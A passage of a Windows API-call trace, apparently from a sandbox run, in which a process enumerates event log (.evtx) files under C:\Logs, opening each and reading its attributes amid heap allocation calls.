lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 55 [0071.487] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.487] GetFileType (hFile=0x428) returned 0x1 [0071.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.487] CloseHandle (hObject=0x428) returned 1 [0071.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0071.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0071.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0071.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0071.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0071.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.488] AreFileApisANSI () returned 1 [0071.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0071.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76110 [0071.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 55 [0071.488] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0071.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.488] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.488] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.488] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppReadiness%4Admin.evtx", cAlternateFileName="MIC5CB~1.EVT")) returned 1 [0071.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.490] AreFileApisANSI () returned 1 [0071.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx", lpUsedDefaultChar=0x0) returned 51 [0071.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0071.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0071.490] AreFileApisANSI () returned 1 [0071.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0071.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46a58 [0071.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 51 [0071.490] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.490] GetFileType (hFile=0x428) returned 0x1 [0071.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0071.491] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.491] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.491] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.491] CloseHandle (hObject=0x428) returned 1 [0071.491] AreFileApisANSI () returned 1 [0071.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0071.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46358 [0071.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 51 [0071.491] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.492] GetFileType (hFile=0x428) returned 0x1 [0071.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0071.492] CloseHandle (hObject=0x428) returned 1 [0071.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0071.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0071.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0071.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0071.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0071.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0071.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0071.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0071.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0071.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0071.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.492] AreFileApisANSI () returned 1 [0071.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0071.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45fd8 [0071.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 51 [0071.492] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0071.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0071.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.493] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38c5212, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd38c5212, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppReadiness%4Operational.evtx", cAlternateFileName="MIF8AA~1.EVT")) returned 1 [0071.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0071.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0071.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0071.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0071.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0071.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0071.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0071.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0071.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0071.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0071.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0071.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0071.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0071.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0071.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0071.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.641] AreFileApisANSI () returned 1 [0071.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx", lpUsedDefaultChar=0x0) returned 57 [0071.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0071.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0071.641] AreFileApisANSI () returned 1 [0071.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0071.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 57 [0071.642] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.644] GetFileType (hFile=0x410) returned 0x1 [0071.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.644] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.644] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.644] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.645] CloseHandle (hObject=0x410) returned 1 [0071.645] AreFileApisANSI () returned 1 [0071.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0071.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 57 [0071.645] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.645] GetFileType (hFile=0x410) returned 0x1 [0071.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0071.645] CloseHandle (hObject=0x410) returned 1 [0071.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0071.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0071.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: 